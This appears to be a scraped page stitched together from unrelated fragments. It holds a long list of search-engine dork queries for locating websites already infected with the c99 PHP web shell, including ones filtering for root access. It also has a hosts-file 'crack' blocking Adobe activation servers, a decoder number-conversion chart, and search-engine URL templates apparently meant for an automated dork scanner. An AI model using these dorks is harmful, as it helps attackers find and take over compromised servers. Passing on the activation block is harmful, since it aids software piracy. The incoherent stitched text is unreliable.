allinurl: “c99.php”
allinurl:c99.php
allinurl:c99.php
c99shell
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:”c99.php”
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:/c99.php
inurl:”c99.php”
inurl:c99.php
c99.php download
inurl:”c99.php”
inurl:/c99.php
inurl:”c99.php?”
files/c99.php
c99shell filetypehp -echo
c99shell powered by admin
inurl:”c99.php”
inurl:c99.php uid=0(root)
inurl:”c99.php”
inurl:”/c99.php” intitle:”C99shell”
C99Shell v. 1.0 pre-release build #5
inurl:c99.php
–[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetypehp
intitle:C99Shell v. 1.0 pre-release +uname
"Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]–
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0?
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell “Software: Apache”
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
Logout
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
c99shell v. 1.0 release security
c99shell v. 1.0 pre-release build
c99shell [file on secure ok ]?
C99Shell v. 1.3
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:c99.php uid=0(root)
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16
c99shell[on file]ok
c99shell[file on ]ok
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“C99Shell v. 1.0 pre”
=C99Shell v. 1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. pre-release build
inurl:c99.php c99 shell
inurl:c99.php c99 shell
powered by Captain Crunch Security Team
!C99Shell v. 1.0 pre-release build #5!
intitle:”c99shell” filetypehp root
intitle:”c99shell” Linux infong 2.4
C99Shell v. 1.0 beta !
C99Shell v. 1.0 pre-release build #
allintext:C99Shell v. 1.0 pre-release build #12
“C99Shell v. 1.0 pre”
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
inurl:/c99.php?
intitle:C99Shell pre-release
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #16!
C99Shell v. 1.0 pre-release build #16 administrator
intitle:c99shell filetypehp
powered by Captain Crunch Security Team
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release build #12
c99shell v.1.0
“c99shell v. 1.0 pre-release build”
inurl:”c99.php” filetypehp
“c99shell v. 1.0 “
ok c99.php
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
c99shell v. 1.0 pre-release build #16 |
!C99Shell v. 1.0 pre-release build #5!
!C99Shell v. 1.0 pre-release build #5!
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
C99Shell v. 1.0 pre-release
inurl:c99.php exthp
allinurl:”c99.php”
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
powered by Captain Crunch Security Team
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout”
C99Shell v. 1.0 pre-release build #16 software apache
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
“c99shell v 1.0?
allintitle: C99shell filetypehp
C99Shell v. 1.0 pre-release build #16!
“c99shell v. 1.0 pre-release”
c99shell v. 1.0 pre-release build #5
allinurl:”c99.php” filetypehp
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!C99Shell v. 1.0 pre-release build #16!
intitle:C99Shell v. 1.0 pre-release +uname
c99shell v. 1.0
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
inurl:”/c99.php”
c99shell +uname
c99shell php + uname
c99shell php + uname
–[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]–
!C99Shell v. 1.0 pre-release build #5!
C99Shell v.1.0 pre-release
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
intitle:c99shell filetypehp
“Encoder Tools Proc. FTP brute”
“c99? filetypehp intext:”Safe-Mode: OFF”
c99shell v. 1.0 pre
intitle:c99shell uname -bbpress
intitle:”index.of” c99.php
inurl:admin/files/
intitle:”index of /” “c99.php”
intitle:”index of” intext:c99.php
intitle:index.of c99.php
intitle:”index of” + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:”Index of/”+c99.php
c99.php “intitle:Index of “
c99.php “intitle:Index of “
c99.php “intitle:Index of “
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:”Index of/”+c99.php
“index of /” c99.php
intitle:”Index of” c99.php
“index of” c99.php
“Index of/”+c99.php

8 Mayıs 2017 Pazartesi

Adobe Host Crack

127.0.0.1 activate.adobe.com   Blocking Adobe Activation
127.0.0.1 3dns.adobe.com
127.0.0.1 3dns.adobe.de
127.0.0.1 3dns-1.adobe.com
127.0.0.1 3dns-1.adobe.de
127.0.0.1 3dns-2.adobe.com
127.0.0.1 3dns-2.adobe.de
127.0.0.1 3dns-3.adobe.com
127.0.0.1 3dns-3.adobe.de
127.0.0.1 3dns-4.adobe.com
127.0.0.1 3dns-4.adobe.de
127.0.0.1 activate.adobe.com
127.0.0.1 activate.adobe.de
127.0.0.1 activate.wip3.adobe.com
127.0.0.1 activate.wip3.adobe.de
127.0.0.1 activate-sea.adobe.com
127.0.0.1 activate-sea.adobe.de
127.0.0.1 activate-sjc0.adobe.com
127.0.0.1 activate-sjc0.adobe.de
127.0.0.1 adobe-dns.adobe.com
127.0.0.1 adobe-dns.adobe.de
127.0.0.1 adobe-dns-1.adobe.com
127.0.0.1 adobe-dns-1.adobe.de
127.0.0.1 adobe-dns-2.adobe.com
127.0.0.1 adobe-dns-2.adobe.de
127.0.0.1 adobe-dns-3.adobe.com
127.0.0.1 adobe-dns-3.adobe.de
127.0.0.1 adobe-dns-4.adobe.com
127.0.0.1 adobe-dns-4.adobe.de
127.0.0.1 adobe-dns-5.adobe.com
127.0.0.1 adobe-dns-5.adobe.de
127.0.0.1 adobeereg.com
127.0.0.1 adobeereg.de
127.0.0.1 ereg.adobe.com
127.0.0.1 ereg.adobe.de
127.0.0.1 ereg.wip3.adobe.com
127.0.0.1 ereg.wip3.adobe.de
127.0.0.1 hl2rcv.adobe.com
127.0.0.1 hl2rcv.adobe.de
127.0.0.1 practivate.adobe.com
127.0.0.1 practivate.adobe.de
127.0.0.1 wip3.adobe.com
127.0.0.1 wip3.adobe.de
127.0.0.1 wwis-dubc1-vip60.adobe.com
127.0.0.1 wwis-dubc1-vip60.adobe.de

html_cheatsheet

Decimal-Binary-Hexadecimal Conversion Chart

Decimal-Binary-Hexadecimal Conversion Chart This chart shows all of the combinations of decimal, binary and hexadecimal from 0 to 25 5 decimal. When making a change in a C V this chart will show the conversion for different numbering systems. Some decoders split the C V into two pa rts. When you modify a CV you need to write back all 8 bits. This cha rt will help determine the correct bit va lue a CV. Decimal Binary Hex Decimal Binary Hex Decimal Binary Hex Decimal Binary Hex Bit No.> 76543210 76543210 76543210 76543210 0 00000000 0 64 01000000 40 128 10000000 80 192 11000000 C0 1 00000001 1 65 01000001 41 129 10000001 81 193 11000001 C1 2 00000010 2 66 01000010 42 130 10000010 82 194 11000010 C2 3 00000011 3 67 01000011 43 131 10000011 83 195 11000011 C3 4 00000100 4 68 01000100 44 132 10000100 84 196 11000100 C4 5 00000101 5 69 01000101 45 133 10000101 85 197 11000101 C5 6 00000110 6 70 01000110 46 134 10000110 86 198 11000110 C6 7 00000111 7 71 01000111 47 135 10000111 87 199 11000111 C7 8 00001000 8 72 01001000 48 136 10001000 88 200 11001000 C8 9 00001001 9 73 01001001 49 137 10001001 89 201 11001001 C9 10 00001010 A 74 01001010 4A 138 10001010 8A 202 11001010 CA 11 00001011 B 75 01001011 4B 139 10001011 8B 203 11001011 CB 12 00001100 C 76 01001100 4C 140 10001100 8C 204 11001100 CC 13 00001101 D 77 01001101 4D 141 10001101 8D 205 11001101 CD 14 00001110 E 78 01001110 4E 142 10001110 8E 206 11001110 CE 15 00001111 F 79 01001111 4F 143 10001111 8F 207 11001111 CF 16 00010000 10 80 01010000 50 144 10010000 90 208 11010000 D0 17 00010001 11 81 01010001 51 145 10010001 91 209 11010001 D1 18 00010010 12 82 01010010 52 146 10010010 92 210 11010010 D2 19 00010011 13 83 01010011 53 147 10010011 93 211 11010011 D3 20 00010100 14 84 01010100 54 148 10010100 94 212 11010100 D4 21 00010101 15 85 01010101 55 149 10010101 95 213 11010101 D5 22 00010110 16 86 01010110 56 150 10010110 96 214 11010110 D6 23 00010111 17 87 01010111 57 151 10010111 97 215 11010111 D7 24 00011000 18 88 01011000 58 152 10011000 98 216 11011000 D8 25 00011001 19 89 01011001 59 153 10011001 99 217 11011001 D9 26 00011010 1A 90 01011010 5A 154 10011010 9A 218 11011010 DA 27 00011011 1B 91 01011011 5B 155 10011011 9B 219 11011011 DB 28 00011100 1C 92 01011100 5C 156 10011100 9C 220 11011100 DC 29 00011101 1D 93 01011101 5D 157 10011101 9D 221 11011101 DD 30 00011110 1E 94 01011110 5E 158 10011110 9E 222 11011110 DE 31 00011111 1F 95 01011111 5F 159 10011111 9F 223 11011111 DF 32 00100000 20 96 01100000 60 160 10100000 A0 224 11100000 E0 33 00100001 21 97 01100001 61 161 10100001 A1 225 11100001 E1 34 00100010 22 98 01100010 62 162 10100010 A2 226 11100010 E2 35 00100011 23 99 01100011 63 163 10100011 A3 227 11100011 E3 36 00100100 24 100 01100100 64 164 10100100 A4 228 11100100 E4 37 00100101 25 101 01100101 65 165 10100101 A5 229 11100101 E5 38 00100110 26 102 01100110 66 166 10100110 A6 230 11100110 E6 39 00100111 27 103 01100111 67 167 10100111 A7 231 11100111 E7 40 00101000 28 104 01101000 68 168 10101000 A8 232 11101000 E8 41 00101001 29 105 01101001 69 169 10101001 A9 233 11101001 E9 42 00101010 2A 106 01101010 6A 170 10101010 AA 234 11101010 EA 43 00101011 2B 107 01101011 6B 171 10101011 AB 235 11101011 EB 44 00101100 2C 108 01101100 6C 172 10101100 AC 236 11101100 EC 45 00101101 2D 109 01101101 6D 173 10101101 AD 237 11101101 ED 46 00101110 2E 110 01101110 6E 174 10101110 AE 238 11101110 EE 47 00101111 2F 111 01101111 6F 175 10101111 AF 239 11101111 EF 48 00110000 30 112 01110000 70 176 10110000 B0 240 11110000 F0 49 00110001 31 113 01110001 71 177 10110001 B1 241 11110001 F1 50 00110010 32 114 01110010 72 178 10110010 B2 242 11110010 F2 51 00110011 33 115 01110011 73 179 10110011 B3 243 11110011 F3 52 00110100 34 116 01110100 74 180 10110100 B4 244 11110100 F4 53 00110101 35 117 01110101 75 181 10110101 B5 245 11110101 F5 54 00110110 36 118 01110110 76 182 10110110 B6 246 11110110 F6 55 00110111 37 119 01110111 77 183 10110111 B7 247 11110111 F7 56 00111000 38 120 01111000 78 184 10111000 B8 248 11111000 F8 57 00111001 39 121 01111001 79 185 10111001 B9 249 11111001 F9 58 00111010 3A 122 01111010 7A 186 10111010 BA 250 11111010 FA 59 00111011 3B 123 01111011 7B 187 10111011 BB 251 11111011 FB 60 00111100 3C 124 01111100 7C 188 10111100 BC 252 11111100 FC 61 00111101 3D 125 01111101 7D 189 10111101 BD 253 11111101 FD 62 00111110 3E 126 01111110 7E 190 10111110 BE 254 11111110 FE 63 00111111 3F 127 01111111 7F 191 10111111 BF 255 11111111 FF Binary Num ber System for one byte Bit Number| 7| 6| 5| 4|3|2|1|0| Bit Weight|128|64|32|16|8|4|2|1| Some Commonly used CVs CV-1 Short Address CV-6 M id Point Voltage CV-2 Start Voltage CV-7 Ver Number CV-3 Acceleration Ra te CV-8 M aker ID CV-4 Deceleration Rate CV-17 /18 Long Address CV-5 M aximum Voltage CV-19 Consist Address CV-21 Advance Consist function control CV-22 Advance Consist headlight control CV-23 Adva nce Consist acceleration r ate CV-24 Adva nce Consist decelera tion ra te SEE YOUR DECODER MANUAL FOR ALL OF THE CVs IT USES AND THE RANGE OF VALUES. CV-29 Configuration Register Bit 0= Direction of travel Bit 1=Speed step 28 Bit 2=d.c. enable Bit 3= Advance acknowledgment Bit 4= Alternate speed table Bit 5= Long address. CV-66 Forward T rim CV-67 to 94 Speed Table CV-95 Reverse Trim
http://www.google.com.tr/search?q={Ux0r_Arama_Key}&num=100&start=0
http://www.google.com.tr/search?q={Ux0r_Arama_Key}&num=100&start=100
http://www.google.com.tr/search?q={Ux0r_Arama_Key}&num=100&start=200
http://yandex.com.tr/yandsearch?p=0&text={Ux0r_Arama_Key}&numdoc=50
http://yandex.com.tr/yandsearch?p=1&text={Ux0r_Arama_Key}&numdoc=50
http://yandex.com.tr/yandsearch?p=2&text={Ux0r_Arama_Key}&numdoc=50
http://startgoogle.startpagina.nl/?q={Ux0r_Arama_Key}
http://www.baidu.com/s?wd={Ux0r_Arama_Key}&pn=0&rn=100&usm=1
http://www.baidu.com/s?wd={Ux0r_Arama_Key}&pn=100&rn=100&usm=1
http://www.baidu.com/s?wd={Ux0r_Arama_Key}&pn=200&rn=100&usm=1
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=1
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=51
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=101
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=151
http://www.bing.com/search?q={Ux0r_Arama_Key}&count=50&first=201
http://search.yahoo.com/search?x=op&va={Ux0r_Arama_Key}&va_vt=any&vst=0&vd=all&fl=0&vf=all&ei=UTF-8&vm=p&n=100
http://search.yahoo.com/search?va={Ux0r_Arama_Key}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=101
http://search.yahoo.com/search?va={Ux0r_Arama_Key}&va_vt=any&vst=0&fl=0&vf=all&ei=UTF-8&vm=p&n=100&b=201
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50&stq=50
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50&stq=100
http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={Ux0r_Arama_Key}&kgs=0&kls=0&dt=tmperiod&d2=0&rc=dmn&sc=on&nbq=50&stq=150
"International","Aardvark","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=0&client=intekom","1"
"International","Aardvark 2 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=15&client=intekom","1"
"International","Aardvark 3 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=15&client=intekom","1"
"International","Aardvark 4 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=15&client=intekom","1"
"International","Aardvark 5 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=15&client=intekom","1"
"International","Aardvark 6 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=15&client=intekom","1"
"International","Aardvark 7 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=15&client=intekom","1"
"International","Aardvark 8 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=30&client=intekom","1"
"International","Aardvark 9 (Next 15)","http://www.aardvark.co.za/cgi-bin/cb/AfricaSearch.cgi?restrict=africa&num=15&q={SEARCH_KEYWORD}&output=protocol4&Terms={SEARCH_KEYWORD}&start=30&client=intekom","1"
"International","Acoon","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=1&preferde=on","1"
"International","Acoon 2 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=11&preferde=on","1"
"International","Acoon 3 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=21&preferde=on","1"
"International","Acoon 4 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=31&preferde=on","1"
"International","Acoon 5 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=41&preferde=on","1"
"International","Acoon 6 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=51&preferde=on","1"
"International","Acoon 7 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=61&preferde=on","1"
"International","Acoon 8 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=71&preferde=on","1"
"International","Acoon 9 (Next 10)","http://www.acoon.de/cgi-bin/search.exe?begriff={SEARCH_KEYWORD}&startwith=81&preferde=on","1"
"International","Alexa","http://www.alexa.com/search?q={SEARCH_KEYWORD}","1"
"International","Alexa 2 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=2","1"
"International","Alexa 3 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=3","1"
"International","Alexa 4 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=4","1"
"International","Alexa 5 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=5","1"
"International","Alexa 6 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=6","1"
"International","Alexa 7 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=7","1"
"International","Alexa 8 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=8","1"
"International","Alexa 9 (Next 10)","http://www.alexa.com/search?q={SEARCH_KEYWORD}&filter=y&page=9","1"
"International","AllTheWeb SE","http://www.alltheweb.com/search?cat=web&cs=utf-8&q={SEARCH_KEYWORD}&_sb_lang=en","1"
"International","AllTheWeb SE 2 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=10","1"
"International","AllTheWeb SE 3 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=20","1"
"International","AllTheWeb SE 4 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=30","1"
"International","AllTheWeb SE 5 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=40","1"
"International","AllTheWeb SE 6 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=50","1"
"International","AllTheWeb SE 7 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=60","1"
"International","AllTheWeb SE 8 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=70","1"
"International","AllTheWeb SE 9 (Next 10)","http://www.alltheweb.com/search?q={SEARCH_KEYWORD}&c=web&cs=utf-8&o=80","1"
"International","AltaVista","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50","1"
"International","AltaVista 2 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=50","1"
"International","AltaVista 3 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=100","1"
"International","AltaVista 4 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=150","1"
"International","AltaVista 5 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=200","1"
"International","AltaVista 6 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=250","1"
"International","AltaVista 7 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=300","1"
"International","AltaVista 8 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=350","1"
"International","AltaVista 9 (Next 50)","http://altavista.com/web/results?pg=aq&avkw=xytx&aqmode=s&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&aqb=&aqs=&kgs=0&kls=0&dt=tmperiod&d2=0&d0=&d1=&filetype=&rc=dmn&swd=&lh=&sc=on&nbq=50&stq=400","1"
"International","AltaVista 5 (Next 50)","http://www.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista At","http://at.altavista.com/web/results?q={SEARCH_KEYWORD}&kgs=0&kls=1&avkw=aapt","1"
"International","Altavista At 2 (Next 50)","http://at.altavista.com/web/results?q={SEARCH_KEYWORD}&kgs=0&kls=1&avkw=aapt&stq=50","1"
"International","Altavista At 3 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","1"
"International","Altavista At 4 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","1"
"International","Altavista At 5 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","1"
"International","Altavista At 6 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=250","1"
"International","Altavista At 7 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=300","1"
"International","Altavista At 8 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=350","1"
"International","Altavista At 9 (Next 50)","http://at.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=400","1"
"International","Altavista AU","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","Altavista AU","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista AU","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista AU","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista AU","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","Altavista AU","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","Altavista AU 2 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","Altavista AU 2 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista AU 2 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista AU 2 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista AU 2 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","Altavista AU 2 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","Altavista AU 3 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","Altavista AU 3 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista AU 3 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista AU 3 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista AU 3 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","Altavista AU 3 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","Altavista AU 4 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","Altavista AU 4 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista AU 4 (Next 50)","http://au.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","Altavista AU 4 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","Altavista AU 4 (Next 50)","http://au.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
